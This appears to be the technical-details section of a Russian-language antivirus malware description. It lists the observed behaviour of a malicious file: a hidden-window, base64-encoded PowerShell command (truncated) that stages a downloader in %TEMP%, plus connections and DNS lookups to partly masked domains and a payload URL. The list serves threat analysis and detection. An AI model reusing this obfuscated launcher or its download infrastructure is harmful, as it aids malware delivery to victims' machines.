Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAGgAXwBfAG8AegBtAD0AKAAnAFkAJwArACcANgBqAG0AJwArACcAagBqAGQAJwApADsAJgAoACcAbgBlAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQARQBOAFYAOgBUAEUATQBwAFwAbwBmAEYASQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1512
- %TEMP%\624534.cvr
- 'bo###argo.id':443
- 'hu##do.pl':443
- 'gp###lobal.com':443
- 'sh###omela.com':80
- 'sh###omela.com':443
- http://sh###omela.com/sjwt9/glzfny3k0366/
- 'bo###argo.id':443
- 'hu##do.pl':443
- 'gp###lobal.com':443
- 'sh###omela.com':443
- DNS ASK bo###argo.id
- DNS ASK hu##do.pl
- DNS ASK gp###lobal.com
- DNS ASK ma####hosting.info
- DNS ASK sh###omela.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAGgAXwBfAG8AegBtAD0AKAAnAFkAJwArACcANgBqAG0AJwArACcAagBqAGQAJwApADsAJgAoACcAbgBlAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQARQBOAFYAOgBUAEUATQBwAFwAbwBmAEYASQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH... (со скрытым окном)